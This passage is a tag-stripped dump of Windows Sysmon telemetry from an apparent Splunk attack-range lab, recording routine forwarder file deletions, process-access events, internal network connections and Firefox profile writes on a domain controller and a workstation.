Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:21.919{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A8195EAC639578EBE8BD1D6156FBBC8,SHA256=FC97C2AC76D9F877A58F96EAAEE11E9CED86C123D8E547CC6F944E6FFE818CF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:21.769{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E47DF5A32B2819E35E21CB7C9D36EA0F,SHA256=45B22A21A9EEBB7DF96BD56E5F9B6EA06A65C8570366C5AF856EC4E848E9430E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:21.240{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18B1-6216-5207-000000003802}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:21.240{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:21.240{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:21.240{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:21.240{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:21.240{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-18B1-6216-5207-000000003802}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:21.240{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18B1-6216-5207-000000003802}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:21.242{C8EA50B7-18B1-6216-5207-000000003802}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:22.775{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA9BDBEAACCEA328EB67CD9957B43916,SHA256=F05EAD2806304D2D731495401F82D2A3724C6365092C402248A44A4106A3F3EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:22.934{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C7B4D8457C71649D8CC8C0B83ADD651,SHA256=A739CA4C5D6FF5199D5A850A15F9331451B8A386CA6AA7BE458EA33674799973,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:23.789{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6CE3AF2598F69CCC1F4D4F0340C3151,SHA256=648CA39BAFA3D5A1CD1C845C40666BAD935CCA240C6B165C12196AC0E3623179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:23.935{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E925A500FC0481BF86D6B4BAEC208A6,SHA256=A536F4D54EFD354CD9344D958103F9327F5C83E627740C56EFF4B7840D85A963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:24.858{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD618D747EC72C45C3B35851333C6838,SHA256=73ABBF84B82385B264CBE6F9390545A7FF03535C2802CCD943566B2646AB9D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:24.951{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=696FB62D5BE00E98E0ED03A5514E8955,SHA256=AEC55B3FDA918A38FD55248196FF5B268773396A64B85C58763EF92399AD84BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:20.607{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51700-false10.0.1.12-8000- 23542300x8000000000000000222173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:25.966{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F2A65A69AF2BE0723FBD4C170BE6325,SHA256=DB585E7BD6B9B0196D73C526FC17187646B1256F4C5BD08574285525817146A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:25.888{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C41497D3FB71B471FC90C9A5814F7585,SHA256=7B27DC56E4E5BC405CBA4841D71B09C5787D14AB0BFAD57894BC95E3EDD968D0,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000298365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:25.604{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\AlternateServices.txt2022-02-22 11:23:49.894 23542300x8000000000000000298364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:25.604{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\AlternateServices.txtMD5=4BBFF43F8B0EB849B9D0BA29344FC771,SHA256=76DA38A20ACC886E8834A2E7B1F87C18EFC9D83F72B1E7B7375994CBB09AC012,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:23.524{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49523-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000298369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:26.957{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:26.957{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:26.889{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B3980237BCA4B2390683FF1389BD55A,SHA256=33BFBC6834CE8FC773D8543BFC8244D7FAAC33F449E8B3553F7E128CF49B48B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:26.981{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1984F40A474FE4E46DA5AB6AEA4887C,SHA256=B5172790AA8A37EF55C3B664C958D5C942F62F5A0D37CF15F10E7636B2B4CDEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:27.925{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74448677A730CC97B137E56880BEF262,SHA256=44DA985CC97F6C46FD038466A2CCDAF1A8131E92B9FF37B21A87EC7581EE0A37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:27.981{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=866A7BE0DE6EFAE9F2C9B9DF17D88284,SHA256=A7E7B87D4C81BE8B08238B9766F36EA3BD4BCB6B0FDCACC06BFAF03D37ABE682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:28.940{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13F353C16C1CFA5F9D76468D9A4B7B60,SHA256=3490E35D7D5B5B1B901C1A6C7E48E2075DCE5BD5D728E90CD10CFB64E726C250,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:25.670{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51701-false10.0.1.12-8000- 23542300x8000000000000000298372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:29.955{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265DA9C04E6E3A8DB078F4F7DC1B6A44,SHA256=D5C770C9B26D02EF975865E5545109CAE3FEA058621D248FBFAA06CF8508C46B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:28.997{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2025C06C09F2E3C63C6DB2E96856EA1B,SHA256=0872E27DFA7A20A133D95AEDAB8A5E1CDEC047DBBFB7D8D09705E49DDA823508,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:30.986{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97EC2152045142901A2F5984251EE298,SHA256=4CD7157A52877844765DDBAC17F36FC357B8F8DB5B85DDC846764D57F48DA2AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:30.481{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=BCD5913A31F32CB95671ADFE9377BB64,SHA256=F2F552D08C476399504AD25D5885931116DAD0D5CEC95B7E717F657B8E4DB718,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:30.012{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5642E23A161760053461C4AD440C77D7,SHA256=73A9E5C442D54BD1ED8A87D18ED4299DDEF1C52712DB5CA0AF9E84FB7F474906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:31.987{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D80AF13EC4E44A59C690449A1C88A973,SHA256=404B976E56B72A7DD80440B93CAA76E1311F65452B6B98C6C9416BD3B43EF6D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:31.090{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED0A58AF0F47E1FC20F5869F8C8BC23,SHA256=AC83A766493BEDA4FF2A868E98887D86DB4B904217346B464980E5ABEAD36AB4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:29.524{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49524-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:32.153{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D80F56C7C250A48ACB6CEEB2250B01,SHA256=62895BA18B1F979D551A8B88944DC6E00912B0C6E6D4BF74D0C2B05393643B78,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:31.514{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51702-false10.0.1.12-8000- 23542300x8000000000000000222182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:33.184{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0855F90AF4C2232D4869FAEEB1499A60,SHA256=D5628DBC61CD531265ABA743E897E280528E0590CA26A01349E67F4125CEB678,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:33.640{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4A24F819539D9DAB4ACF9FB765033955,SHA256=C6EEB35A296211ED8397967B08A325450E175D57E188EF3FAB0F1C5534213498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:33.371{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\permissions.sqlite-journalMD5=3BF28022B6A4030244480F94715B74EF,SHA256=EFD008002E5DD418837460A968691FFF4DC174308429DFD2E815B0CB1EA18463,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:33.002{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5AF86DC95D018BA05181AEF540F30B,SHA256=28D30E5BA803A372564ECF686C54E1298EFBC8A3EE1872A86C13488B2C21685A,IMPHASH=00000000000000000000000000000000falsetrue 